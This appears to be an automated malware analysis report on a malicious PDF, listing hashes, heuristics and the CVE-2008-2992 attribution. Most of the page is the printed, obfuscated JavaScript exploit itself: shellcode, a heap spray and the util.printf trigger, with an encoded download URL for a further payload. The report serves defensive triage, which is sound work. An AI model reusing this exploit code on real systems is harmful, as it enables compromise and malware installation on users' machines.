Malicious PDF — malware analysis report

Static analysis result for SHA-256 a8cd270aa97689c5…

MALICIOUS

PDF

13.8 KB Created: 2008-12-02 20:29:03 First seen: 2026-05-07
MD5: 08551a2c370e4278671682f963b4c8b5 SHA-1: 423a9bfc7d4dae645b1cd69aef821309ea388c05 SHA-256: a8cd270aa97689c5cd4c238f3544e02966886d4ee6855b75c06eaea9758fedc4
248 Risk Score

Malware Insights

MITRE ATT&CK
T1204.002 Malicious File: User Execution: Malicious File

The PDF file contains embedded JavaScript, indicated by multiple heuristic firings and the presence of an extracted JavaScript file. The ML classifier strongly flagged this PDF as malicious. The embedded JavaScript is likely responsible for executing malicious code, potentially leading to further compromise. The specific intent of the script cannot be fully determined due to its size and potential obfuscation, but its presence is a strong indicator of malicious activity.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9999

Heuristics 6

  • JavaScript action low 3 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Adobe Reader JavaScript heap-spray exploit (known CVE family) critical CVE related PDF_JS_KNOWN_CVE_HEAPSPRAY_FAMILY
    PDF JavaScript combines heap-spray staging (NOP-sled / shellcode nybble sled or a multi-kilobyte setTimeOut/setInterval launcher) with the removed Adobe Reader sink util.printf, associated with CVE-2008-2992. Benign documents never pair heap-spray with these long-removed APIs. The exact malformed argument is assembled at run time, so this attributes the exploit to a known pre-2011 Reader CVE family rather than the exact primitive.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    varh8kt7x2qzDsYJkfd=function(YMRwf_vXNM5H4yF){returnunescape(YMRwf_vXNM5H4yF);};varvN_t=h8kt7x2qzDsYJkfd(%u9090%u9090%u0feb%u335b%u66c9%u80b9%u8001%uef33%ue243%uebfa%ue805%uffec%uffff%u8b7f%udf4e%uefef%u64ef%ue3af%u9f64%u42f3%u9f64%u6ee7%uef03%uefeb%u64ef%ub903%u6187%ue1a1%u0703%uef11%uefef%uaa66%ub9eb%u7787%u6511%u07e1%uef1f%uefef%uaa66%ub9e7%uca87%u105f%u072d%uef0d%uefef%uaa66%ub9e3%u0087%u0f21%u078f%uef3b%uefef%uaa66%ub9ff%u2e87%u0a96%u0757%uef29%uefef%uaa66%uaffb%ud76f%u9a2c%u6615%uf7aa%ue80 …
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY
    Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Related samples 2

Ranked by shared artifacts, heuristics, extracted URLs, CVEs, and signatures.

Full JSON: related samples API

Extracted artifacts 4

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0006_000.js pdf-javascript-stream PDF /JS object 6 at offset 0x179 13184 bytes
SHA-256: 63ed942dfe734ef12202273a5e8637e9ece8226cad1fd171233f39d537f07176
Detection
ClamAV: No threats found
Obfuscation or payload: likely
100 of 115 identifiers look randomly generated (e.g. 'L2pVzcdUajg8peSJABIjokt7JqLzs8Hoxw_mOd7p') — consistent with name-mangling obfuscation. Carved artifact contains 3 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
var /*JfdKo3nWp67oo_4OEkruthLp3tuH5qGLLjWzb0*/h8kt7x2qzDsYJkfd=function(/*lNe8cKjUj5d_K4HoXWuh9W2uznFEBDe6Q92sHZCrTfqdYyGwJ2SHNJ2Bx8Fz_kuPhl9pAAVTgBx5z4q0u9G8H8065Eu4odILDG1DGKWnLIgABL0wJF*/YMRwf_vXNM5H4yF)/*gmxYipcQvH_Rewu5_jrZYEBQQeQyqEiirV8OAYfvfeC0Qw3PVjotoq_6KQs2VQYBmUQmsvWNPYMfKEvfnZNRENLPd5FyJe1vyFWg2ttFH7lR_VwXazqfnFpt31ggOemzd5u__jvJDXupf6O6t5aW0EF15mWIG09j4ri4PSBSqv9KqLFZFgwEk26e*/{/*fniPkHIRpAg9Bznxxyd043DYnH0eBd8SFfiq*/return/*E4GthFmwKMc570*/ /*f2yU9sAE4LoP_EOKKHQ5pWgags3an1fNrSio_it4tWIsbW3ldIfHeAhAtZaWP7j7OGkOoSGXpPEF*/unescape/*CCrL7w6zaY8lbDafKk3xwATxCfwyp2g74NHy0*/(/*MZbj_3nZXx_OkwO4iQYTECJk0CyG1wIcLkAKbnkzakC_VR45iRNmTWMSY_YOwhq8GqGiTrWtQZtmrmf*/YMRwf_vXNM5H4yF)/*F_5zMFEq0JdHnT3bYO8P9qVEl7VlRHNBGG2TL60JEcRrvJIJYEYVvtZWpv884J90QyRctQmxs4ecBmmaqAvbtKxY7uUy5SxJ*/;/*bRcmU0G2EHiBf856_w5gtY_ASY4Bk5C0KekfcrWgz5iU2bP1MIV7*/}/*A8RrdOsS3fEp9Di1G8dO69QY5jdZGJAxFRdjgL2Xr7Bp0jeFf9Ua6lzyJSMQbNDhfgFAs8YY4ZC30h9eeR6Y3tMB*/;/*F7zty2Sr4Q3W2XzitVWm4rdU7ShDock0XZrKQ_3IPufG*/
/*EXCn0mfpKae_I1IBx5RRjk0yhcsD4nKUAN901co_3H0A8GCuATAk5_Yab*/var /*wqEEKMjLuj5I_PX7zTJ74XkLe81tA6T9lYBvkk8TJ1bJFzE5INzAlZMEVByW7GThfVRE6OXEDzNJoRCwf3xFQ0Km_997ERcjmuoh9AlB1yKeFNPkFBqWA29Az*/vN_t=h8kt7x2qzDsYJkfd(/*js2MEDedC3rzZXvfD3DWiZFzzzafa6vTmmgrp_Js32gRNRwQIzmrOsfDg6j8zTQb6wIjwRQoHx6VDqlMfN4u7XxcRVZGopijbqHN9Y2FKvaObBa8OS*/"%u9090%u9090%u0"+'feb%u335b%u6'+'6c9%u80b9%u'+'8001%uef'+'33%ue24'+'3%ueb'+'fa%ue8'+'05%uffec%uffff%'+"u8b7f%udf4e%u"+"efef%u64ef%"+"ue3af%u9f64%u42f"+'3%u9f64%u6ee'+'7%uef'+"03%uefeb%u64e"+"f%ub903%u6"+"187%ue1a"+'1%u0703'+'%uef11%uefef%'+'uaa66%u'+"b9eb%u778"+"7%u6511"+"%u07e1%ue"+"f1f%uefef%ua"+"a66%ub9e7%uca"+'87%u105f'+"%u072d%uef0d%uef"+'ef%ua'+'a66%ub9e3%u0087%'+"u0f2"+'1%u0'+'78f%uef3b%'+'uefef%uaa66%'+"ub9ff%u"+'2e87%u0a'+'96%u07'+'57%uef29%ue'+'fef%uaa6'+'6%uaff'+'b%ud76f%u9a2c%'+"u6615%uf7aa%ue"+"806%uefee%ub1"+"ef%u9a6"+'6%u64cb%uebaa%u'+"ee85%u6"+'4b6%uf7b'+"a%u07b9%uef64"+'%uefef%'+'u87bf'+"%uf5d9%u9fc"+"0%u780"+'7%uefef%u66ef%'+'uf3aa%u2a6'+"4%u2f6c%u66bf%u"+"cfaa%u10"+'87%uefef%u'+'bfef%uaa64%u8'+"5fb%ub6ed%uba6"+'4%u07f7%u'+'ef8e%ue'+'fef%'+'uaaec%u28cf%ub3'+"ef%uc191%u288a%u"+"ebaf%u8a97%"+'uefef%u9a'+'10%u64cf%u'+"e3aa%uee85%"+'u64b6'+'%uf7ba%uaf07%uef'+"ef%u85ef%"+"ub7e8%"+'uaaec%u'+'dccb%ubc34%u1'+"0bc%ucf9a%ubcbf%"+'uaa64'+'%u85f3'+"%ub6ea%u"+"ba64%u07f7%"+"uefcc%uefef%uef8"+"5%u9a1"+"0%u6"+"4cf%ue"+'7aa%ued85%u64b6'+'%uf7ba%uff07%'+'uefef%u85ef%'+'u6410'+'%uffaa%uee85%'+'u64b6%uf7ba%uef'+'07%uefef%uaeef%u'+"bdb4%u0eec%u0e"+'ec%u0'+'eec%u0ee'+'c%u036c%ub5'+'eb%u64bc%u'+"0d35%ubd"+'18%u0f10%u64'+"ba%u6403%u"+'e792'+'%ub264%ub9e3%u'+'9c64'+'%u64d3%uf19b%ue'+"c97%ub91c%u996"+'4%ue'+"ccf%udc1c%ua"+"626%u"+'42ae%'+"u2cec"+'%udcb9%ue019%uff'+'51%u1dd5%'+"ue79"+"b%u212"+"e%uece2%uaf1d%u"+'1e04%u11d4%'+"u9ab1%"+'ub50a%u046'+"4%ub564%ueccb%"+'u8932'+"%ue364%u64a4"+'%uf3b5%u'+"32ec%ueb64%ue"+'c64%ub12a%'+"u2db2%uefe7%u1b"+"07%u1011%uba"+'10%ua3bd'+'%ua0a2%uefa1'+'%u7468%u7074%u'+"2F3A%u642F%"+"u7077%u72"+'6F%u6174'+'%u2E6'+"C%u7568%u7"+"02F%u6F72%u7267%"+"u6D61%u"+"752F%u647"+'0%u7461%u2F65%'+"u646C%u"+'2E72%u6870%u3F7'+"0%u3D69%u6C73%u"+'596C%u4A63%u'+"4D34%u652"+'6%u703D'+"%u6664"+''/*ZlzUNlBFF*/)/*rrFhWFSyzckNYUiLNWozpAbir53nMYr11QyNqfY7ePEu0j1F4e5ieUFLO9yNePLvDZbixWBCavB_lG4EAajVgujei_1CPBxSaN2Nk4PAo*/;/*JOX4SXT3szlRSJQILfJ0yjMowwgBxKSxYpprB9iuxJAFSQNewWcj7oNrZttM5A0Rqn0slhbXqbc0spceA5C7hPn80WJ3WHJBvHtVoKsUmKST1vx1o1wLFZIDvR7HZEJJJUtoou3ltrDWq6dp7Zw9JxRKWKJull1F6jtiSlJARMW8HzmCOXAYJSigcrQDRFIz3u8c58tFSqMHRPWpQuziRUA0lDPqLbUCLQfENNJf5WnLm023tpa__a9keNQpols13M5EaDjTaMeBLU55_U5*/
/*E2jNE14saliRxbVNe6g5HA7SV1MVJFU585HAt_tJlQbXsxlLsGFzHBHd2Ty_YH5VAAWuAE4lVU0CGjOyqTmxVtPLCDLbLEwL*/var/*C5MZczIGVGH7I8uTazgqZmrF9s76sv1ooCCG2LMLSTHaP2uqqQVE3CJzuFuc1kFdmIjdTwpmEwBUnw_SBVW5YgtIlckbCp6pyeHGPxsTiunLgndh91bVVJd8l*/ /*SosTSgxZmBLUVuE06klYHjNi5jsXgTa68INOo_nQBzlXjpVeP73*/G4q71l="";/*he1CMKoXd8MNuC3jzDoNMs0enG4rPB5HgtJs5xFWtRkdTcCHgrVsZTLBZEtpFmwlV6TPrYmapL50o7FJna3BuDDJHwyMYjyudH0KfkkKweIaZOjC*/
/*i7FMzqhIojOMxC4GoxX6nZ0z2J5mV0uQD7EudNYCcl1ed8HIYfCA6A1vJtXesHvwC1fgC4ieeX9HFEslHsfHiQRRow0vhuyWPTYI34mP1ij7mQgu9B2gRF66vqbfdxuwL3oDd45BbzorVXpWOKoW9jRsOsMsf8eqyHtR_nSbb7HxSxIg8x45WJml3zSWvwBj5v14XHUzCblVNu2KhuE44reugw*/
/*EiI1b5pUQxoF1FrKTbBe9vi2oPUYvGeBom2*/for(/*nqdm8zADdpmBGSITPhJUs6*/iCnt=128;/*GDYfGhm4UzR4nAWu_hOkHZVlhv_vUCZwFxQMU3EorWhTW5CVaR6hqQHNB*/iCnt>=0/*zVJYHPLXbfPgJ73qOOkRj_iehOvpcwxbH7zOLAmmf2Iow_U_N5Rx5zRbDBFgy387ywJ0wvlRmt7XsQX7KosDd0fhAkCzb_uPw5NioyzPhvnOA_JKo3OG2to2TqpvqY*/;/*ORN07ByLiizwjz7ucx0jnsMeA4Jviiu0199v0v8gTwS4kNmBAlkoSwISo*/--iCnt)/*wW8B9vVLWXQb2YH87eCOR3r3EEMnPZdNwZPtJk5g9K9yjFvfjyt2pZtud6WtUz8FNLyXvs5s42gc7R8fEpWuEFdhA1QUpMZ3XNPI7I2z_XQ7oMbt3yd847e4wuNa*/
/*RgZxSD3HIjSb_T68EdyssHFdOke3LU9r1WeIaVPi5i_42616YnnGvsj0RC2dXyKNKo*/G4q71l+=h8kt7x2qzDsYJkfd(/*GVwVSAo0KTbwQQxUtc7uiN43cZBxH7iCRUYjVCifV_RmPD79f2sDEl6h_8UH33JJMithkQC6PUhfYcc5TK8Yv36vyP3qHAzTji2Iy4DDNkilBAeVKbt6Top*/"%u9090%u9090%u9090%u9090%u9090")/*mST1hcvqSjqpzlTBCC51f1sbTlMDym_a6SPbuAHCjxrYYAaaDTQiJ9_cjLgXyfxsyCJhCQjmDQAcRa4UVMzyKovIi4WOMHhErvrtvRSZjEh3tz66nsFRdNqLGCaSJ8W2rDjcU3257YwpMrj1ZpG33xC9zcQ0Zm1FqYhAPY5Lxq1_WZzvD7m7sShHJggwVlbuIb_hVLUBATXaHIeCvZvZTSgcyBOJnq5wH4TcDndE72fC00FtY1IsIoK8pYFSD_DK3Wn70GA58g87fBp43xkAau8FICXMBbW5x_1wF2qCK02onugZTg1Dc6LeSYftvYguOR1E83ai1QMd_s4TNsXpnjI68oorCJbQaQUXIv70AHbAzTUCBrroQ1j*/;/*kM5gVUxwkGIs2Dr3LH4AbNCc6tGKjpWC2QiLkU9JbG3SKiKVqDVHQYjKGqVqUsN_lI5IHw_Cm6aPhh_PF0gIz_gnKtxyDWyoerxmdwoEqETNlTcrS0zH9UuIDg7G3uvWai94Tm8_q*/
/*uRkp94ox_mHtuKPqRHZCdzkbr5Co*/
/*x6GAfv0XYvWA4FuCUZUbyW6n7VT1Y9tH3zHWkGu02F0tLswfHF87b3iXN3Mlz6tru2DU8xSy4RgD_SjGXgBzXkLkbYLQT5*/iF3HUFMvuX=G4q71l+vN_t/*z9QWhlUrCajUkHf6xjQ6zoeMJUadBHo_Y_g0TMAuvVT32NpZejOHCO3LjSpkaSjySFxmSyVDJo6_3kZVJodL3VXanBACUk2mqnO9bjAkM7kEf_Zon31fMN61*/;/*q3jgtKLWYIx9JWKE8Ok7nNifDDsQ9hf5ZDaIOlenuQk4nu9j9helvCGyFyEDVj9vmX420WdsmClPxiyuESVzVbnaPrelPcV3zNsxkKeMNFb_nOurgFf2gHRw*/DOYD5yQFCY6Q=h8kt7x2qzDsYJkfd/*Nhx_imSGJIO9BRBO2j14jUNuw8pEkUMc2_bYmuew4st60vJ1T0s4S7mE3RJblV5bUVz7FSs9Aa3_LA1e_hXSc_WUQfw21qRKAGGFZyDaO6ZZ7O57w*/(/*vOQjigDUX5_oE_vKFJ9IjMD0l_Mf*/"%u9090%u9090"/*u44G3VpD2B2VzjI3sqdPgBggdy7WHpeAik34P6uQwEFUN8B52_JWBp3fcy2kcUk_5c4IWmZHqfc5cdySd8oelg0DTznvINvCpnLBOlJ6GlziDm1hjeAJ__NSy2D8Dz_tbKuqw4l3dZahBPDlEutD8B3xFy25yjV0SAuLlmp_BLBRPlAUUuXQwPD2D6u2eEzxFj9rLmrNyseDSfXmPv4A_82C3l5VqtHvRFbcsHqfzKiGp6Apm5pivsZVlvAT3wk9MCpUtKI4sPhn0bSkV9IFphbPRciJNIHaLwu584woITRGukrEhzKLVmbnD0xQH6rSqaMmT9QbQihAIOFqCQ2Y3SB6QzLYt3qZS3*/)/*A1RBG1jG9xLn1beNTwONCCZavRGJj0KKzcL6SvAPiM4XnXk7JzJM2jnm1uwZs8jgYvbqfb7CozaRMdWDNs7B7nzfyTrBYHAAWvr41MuWUAHIxeM_LHBHu1miJSjhakixVPpKbYhwZp5LIGLUNMb9CDfLWEtwpRi_gNK9lruAVnLeuWy8*/;/*b5mSZypegbJx_ITMSRy_AyUo_yXWmT63NkvBXrzpenAv6SUBq1DeMnqwEE8UX2SalTxRHcwzYxjTE4UvtXO6A6rE0oZWerwE_jWHBI7Z6fs0YCuGa0Ba4se3V4Nzk_5jjQrkYn0SHrRftAmJ0nj3VCtq78ff7ZEfp*/
/*fCXDUfulAd*/BM=20/*pnUzG1PQnOY8arNOqNB_2AUXZhSQuzaXIPe0eulsHiIzvWe0YezkCwrjD8T3Xq_nJ9G5jzAH8z4TT2rxqGEs3vR6ExFRxsavyUUmUbjJT4dJkP1qUhhEzcwZP2qBjGwWaF0vhi61bX_Anzr8WOAKqxj6oP8MVtjwyigVpKgxKha_NWVbXgHJFCyU0_qribfG81LXAsKLPkKd7g5TBBcGDPbCPGuMP5eEF3FyBRCmbfi9Z20bTFfighynRlKgfplkgrXi9aJY7rWVhUw1ZQY7yLiFxtlRXL244*/;/*p1okOkQk6y5roT8BPvNy1_gbR4nIwfWMUAwjlCIf1CLdWIfl5sZts6K_*/vgxlV1St03Nch6r=BM+iF3HUFMvuX.length;/*OHjSewnfhLFkTlaWw5s6YTyGthznryae7_wZvY5Sk_35kRPVK9QjRDq_kemRSCvNBhmx6gEeg7YFNnbYkr93un2UGdlZfVmh3OTxvXUmkPLbkNKQJGvoCJthzdl22pKWZwW3X9e8MpYw4iCCpxqr8ZOw41mtexE4jav7YO4k5QWxzYzeLfLI5LwOgesSjl2_VxXkp9d7UPvtEO6jZDcz9NCdsvwRVnQqZoPEmt_80vpC_kmZnDNkQQD0AzPWbgB1JR6vA6s_pXBp8nDkrRK9hN7hCL5dr6T1MNlNHSMxq*/
/*um3fMiwWgSkb1nmtFToZI2nuDvCPise0UVeg5P4Zhd1XFcFLwul6kNon0r*/while(/*zvHMBrvhvE5oEisDS4Jc2SBCV_oVMIPK5XX6DIcyMWcR5KVMCep4wq7Hpjc2srBlDYgHh96tUWANgVajzEbluXsY7JPn2RO6qvBMt77CS7QzQqYFuzqdLX3HhHvXY*/DOYD5yQFCY6Q.length<vgxlV1St03Nch6r)/*wVzWiq7KRv6DKn_tJXdkD0B_Bpyb*/DOYD5yQFCY6Q+=DOYD5yQFCY6Q/*fTpVgSx64d3uNekhlCI_iemFW2YIlwa2EFMB_gPcX_q3jNcmVcKzEPK6oTfZtWezjFLilbA0aq1_4SmOvxC1*/;/*xupgPEPmjEKoQtPrtOHZDHRWugHgiHYWfts0PlNH_vl1IrSN4D8d9hrmJpSCKrZqZGoos3wrmWhuDz9736Y1bEblutn6ZCkzIc2FNiskEco4ajvU8lvBBWwv_qJBQ9SaBkojROnu3gJaRdX3OZ5lKok2ylHwwmLxL1VdD0M6fVVxzsoDHioSLNI_zQvk38*/
/*Iwrgzqtu*/
/*JE85xl85Jl*/LMMOHzOq=DOYD5yQFCY6Q.substring(/*KDuSPdOKfhFvWWaubKiGouef3BnnYAmqEW0Tz*/0,vgxlV1St03Nch6r/*GbFPf57aENL0QVlPDunhTrfUqg_e86eYC1ohuj9ywIxCdXShUDbmjvSEvxBpQasGDO1nMoZUabyxtV5oZVQ9FjC1VEfmeMsibiKnLk9lAwYtGSXgnodtMgjilDJEP3nrZyTkXRLXCjGJ2epeIIMUov4OyBTD48vRuE3HVCfWmhdGM8OUIj04bNrcgvVdfnNjeU6h1SIb1mhBiwWqUUjviPNEAihfKuEpE0M5RVVG84IeoeJ9zttX97*/)/*dd9eosiTwhfqy1A6w4CPghZeWHMuFHKDlIhP1FimmCSa3SVoLY4r7SKSZXBffLiFUFVKK4wx7DNxWiah8TO3lYJAwKfQWDWqIr2TkmGfqUSC4tjzBxqnL1n8_INWL*/;/*PwrNS8Rhi1lte2buiK9qjBy2XhWfD6clqJy9FEfo6GWZ9yIg9FLgG0Wegt_jnbJSk8QpBv*/
/*OzUTnkEMcAifwPBl7uUFyYCrKooExPPHDjbqJf3lfaF*/xktOqvnkBrtOrbJm=DOYD5yQFCY6Q.substring(/*oTukEF7ezWpXdSH9y00alWbNCfjAzYNSr83wCyQ2J6NnMUkATib663H8Xr9LEKe*/0,DOYD5yQFCY6Q.length-vgxlV1St03Nch6r/*ZUP4n1rULDmN7VwuWja_vPnrPv5m8doQtg5iBn4MrfZm1LWMvxLfBzMRjF4gjhxRCq1ETsQ_MqmB39NmuZHwNTDxZ7S9cFOfvDkEw*/)/*T9gp_YnNA*/;/*L2pVzcdUajg8peSJABIjokt7JqLzs8Hoxw_mOd7pBblr752760fiiOds6phmloQYaP_pt7TuW5bSxROrQuPy9tg3XCe0quXG_XvsSEcp948vJLca6rN3auuywIG3l2LrpkuWvX_zKODRSns9wN1WsPc_6j2gaCMEn7aXTaLdpPu84c5opuAX_dX5CNZcQmg4h8P1WbTArC9jf3NfOikr6euI5LYfsQCog4_9LAoO0Nt1a5bpbAVWfEeYQ459J8lpzln_mQNle8a522iS35oX0IwPAqMJmzaZbaBsomLlCFb5ouwiYIhg5whk0rLxgmM9BNqq13Q38swlbhJ1prVjd4IbkUOF7aC9osnek5VhlGHCnR3S9N3aFA3pUFvQgyNJg2nF*/
/*tmUFuXtAOB9c4Yi5PNOV9e2vsARioWRn9msr0bsNcqqVDNOTadoY9fJpgaNKxfxuGfbF7JTXz0s4M8Mma2AXVKB3kPBWuyG1Si7NrPlgNTZZQlBqbCCxMEoxTpJCdP*/
/*Gyz0fDkAQ4ZqJ_szau2M762tOf3Q0GIu68sZASZQLz8UzoIPY_cU6SCIy5ZwAif6fNTfftvrisAWWJluJDDDVFMI_l6_IZ5nnM*/while/*RWhJJx_TsN76if62D*/(/*R9N56kk4wpCPbKl9UuvTCch0XEeR7hnrf1laaLSL1VbQfCOzx_I1cqyzuRGqytXSj9t_IAK0VmP1oepadyP7dDuMU24IkPbJNJI*/xktOqvnkBrtOrbJm.length+vgxlV1St03Nch6r<0x40000/*cHJ1aMmzI6wl_AFvEqz2g4yBhyaKAainhrc94ExB_im_jsuoXje4bS60FUIGvqtSXLPQQBRPk5PJl0x0*/)/*s20jw8oFFv2wdIIpYY6ZqK_jZIJY7I7M06wuT74zdlzz80aqHduKzzPy93yGRru553Czv2SVqHSoh9vAs7zgSxUQoHW7zF1s93hsszDY7VBdTweArSh_F3Pt_loyrefpVCXD2abxwcPEOtF7Bm6GdJ1dveQc9wHSyeWp5xbpPqudZzYab*/
/*S6dWXO1nqxZxFNRb3KNS1c0j7XYTyznUtFrFTgt_THxYVD1MODfDfdnb2AupzX_icqnvM*/xktOqvnkBrtOrbJm=xktOqvnkBrtOrbJm+xktOqvnkBrtOrbJm+LMMOHzOq;/*Vc8Ji8gTozXFeV0bFImiigPvYpfHcQVOsSXQO5j3t89MR7nXDP6lvJWIy2QQHlez52EHuo_dk8p24SO7hIhSS5bGvrW3S1rLqvTazgeh6zluAzxg3S0et1fdeT1d3RJfCW2y3VUwJ6gKtSqlkpFTekw05lcv4mP79GtzbDll9GvrZbS_FXSk8Di2pAlim2ej8MYYQSOFu6eLMdRkw2g1ZWfa9DByhlvu0J_0IND4IiDVBV6xLbnlyHBvKCjrnUbmealmoofwMjGO5BBFcorPwsA7uknX5D_YekAHOf4bE_p9AqCcUusFbtBLSoiMsikLHlT*/
/*SLxJLbHLHKoc5*/GWn=new/*eF6YpmwL6MF2VTE0TsPUh1rFfCku0cGdiB2MnnYizeZJxeIFLYatOHztKYdI1klYzkNE0w5cKDPoMV1kwiz5XiDvALllw0LNjZSiKLAUPQ9blyBXV1QsXTdYeEFDKenjwKt9LDMbBnBzoYKep439WQcaPteZM*/ /*r9Ss6dvH5xu7lYUv40ou8_AYaPH6oTBnRTUMwETq2Clcb6NT52D11DOQTVK9oLk7f5HQ9a8zdhQ6cdOVURLJVZaovklYwKUQDbhB3d1UAGOckcy5u0DFYdtICUhzf*/Array(/*BTUe6jUjC00gwObORLblo18Kqtoz3SMPMm7XmewvoKqwG4vApf3EVzOAi31ZKCpXokuPEgAsqqe*/)/*qOxNuoSEdgFAY6Zj8D7lop2sK2Z2g5nFIZT3Dl7gHBhg78E4A_dopTV1JvqqoTwxsEovpkRxlr4_Pi1H1DDXMlpeeFlOx8FFwwRchk484w7ITwPJVgB5LgYRGmDCsJzeaQBAI9555BNpRWek4geEB4VIeMMi_r0Ps0Yq3Sj5gOK4svvN*/;/*gPGLXlkiyIheHxMFL49ec2_qB3YwnmAd3GoPsNxgWUAdHMjSFhxhYxNZpmKROKuFRXU_lHf8bfais02xgoU5aiSEKdWYoGd7ey6E6aBW6b6*/
/*iUEjfWMDi6lIFstZEzk20vRF8ZPl2I8YcA89XJA6ElDKTwjXlINj5fo265bwCXKfYGcvQc*/for/*TtmjJvwT4HcLb7G_PpCOniA3_OIKquM_dzinjT7ba*/(/*E2Tt2jX4xAbx4aBAlsvyrNmO1Kiwm9IOzc9qAVjyWAlOamOBT01AMbOBmwyOu7djXaOYwyLHywVOYjPsi*/QAU=0/*Pwa7Zu11SI6clQ2PWTK1HF6Cf7YaXSCyEcudMjTfrN8Sdxh1GspOykQ*/;/*lot48wqAOaea0x7q_49cqfSwM9A_hQSC6B63xl3AAVb0IWoHPmk6G3qTzrTW8lY3nS*/QAU<1400;/*b5la5824ENhMcIxWPoCjdu31rdNiFgQeZ26SxwL30tDb31yGe2p9k*/QAU++/*NhvWZvW3YALu1UegAIzw6g1jRfIjRuXkQH7q3Si*/)/*Yt_ICdoDldzg_oEQJNzb9LAOT85KObahKZqN4TQMDtfXfDuGM9pGdT8XNYJPwTuKaL6qokAsTfEzjz6vwk2rynFMwV9EEHeQCK5nLl8qqvPeq_QP2fHpIN25jz9n8c40mxmxYidDSti9szMjTUNciEVG4TuzvnyXZZKy8o3PWZMDNZnhu10S6UZxnImYvavKz70wjL6P*/
/*UdnlAXb_pVTDI8MuU8JFH0AFuk7veK0comCo0ennz7r834rM11R9zSCi30TWJSyx52a3UDfJ0LF2DwD5mV2an50f4R2BjpycfNU1Qz0P_DGD1J9cfy3Hs1nkHelrI*/GWn/*gzzJe3AJDMROq6Wvt*/[/*BtgErhpK7Nv1u4oiBIZCSdPkr6eCqNqU7MYmtDxpQheAaIjbR9djbtIHnnKT12nwCBYwFKaVs6WHC6jU4C4Tv*/QAU/*GYolrdbUPeWnPbxqxflImoCK97N2P93qVgRC_tWOMs2cJoI7ItDvWG6UBiRFC8biNdh81wJimlrPumYdK1wDJyLTERWBs5OKbLA*/]/*Jiy7PDp2cHgk9RoGFzaJFwKypZ0Fk0S6hF1wJemlmI*/=xktOqvnkBrtOrbJm+iF3HUFMvuX/*CQ__zEfEj57dMtOYlNGop0edE9Tu75QsKQs0VND5H0XUsmsS1z8exa83YQmTJ4BTIuRe8VXDTvXBXFUM6QqrrnjE4KYCDZWMJnqF0*/;/*eSygTKmnWg5CNkqxoi9C*/
/*Anmdd4RbIRfPVVZSx5Fo*/var/*kjRlkIEadEh*/ /*nGKV_5TD0rgszjBWXhMbFeCqnHFFLmxtt8Dt2XwzDRh41jONFbpK6r1hy7m_iZtQWw_NI*/bUJR8tSnc=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;/*wc*/
/*zeoYlH0SPXb4_5V4LwAdRPymoFYhLCi0gMWHTVZjt1bsuxk7jlY11LceR1Bc4kbYwyfFI5p2uGje4IZctxSj0uDPkFscpI2b8VhFPL8*/util.printf/*pvg7xIskWbfzA4POQABcHzNcClBSTkXAU58HCorYFMNGEdUVeWxlLADOmFh6q57Ay3H1gyOm_csE6CaYYN_kNCyzIVu*/(/*npyCh73DtFpthXxcZN1yazYn3McAhMy*/"%45000f",bUJR8tSnc)/*bE_wtEC3S2TPCTeVPXgez7B_VrMNAcrxhqiPvkHCbaSeuw1_JVe0Rf9mLJzLmg9IMgX8Gf_i7RBpD2pMMIKdnIFzR5_4Z9AleYik5*/;/*Flk3qi611tWI59wPepSsP9e5gb7*/
generic_stage_recovery_000.js deobfuscated-js generic stage recovery split-literal-normalize from JavaScript object 6 at offset 0x179 12974 bytes
SHA-256: 203ed3dc6254a461dc5f7638246c3cb7837657417662a60b7c502965a5c5424d
Detection
ClamAV: No threats found
Obfuscation or payload: likely
100 of 115 identifiers look randomly generated (e.g. 'L2pVzcdUajg8peSJABIjokt7JqLzs8Hoxw_mOd7p') — consistent with name-mangling obfuscation. Carved artifact contains 3 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
var /*JfdKo3nWp67oo_4OEkruthLp3tuH5qGLLjWzb0*/h8kt7x2qzDsYJkfd=function(/*lNe8cKjUj5d_K4HoXWuh9W2uznFEBDe6Q92sHZCrTfqdYyGwJ2SHNJ2Bx8Fz_kuPhl9pAAVTgBx5z4q0u9G8H8065Eu4odILDG1DGKWnLIgABL0wJF*/YMRwf_vXNM5H4yF)/*gmxYipcQvH_Rewu5_jrZYEBQQeQyqEiirV8OAYfvfeC0Qw3PVjotoq_6KQs2VQYBmUQmsvWNPYMfKEvfnZNRENLPd5FyJe1vyFWg2ttFH7lR_VwXazqfnFpt31ggOemzd5u__jvJDXupf6O6t5aW0EF15mWIG09j4ri4PSBSqv9KqLFZFgwEk26e*/{/*fniPkHIRpAg9Bznxxyd043DYnH0eBd8SFfiq*/return/*E4GthFmwKMc570*/ 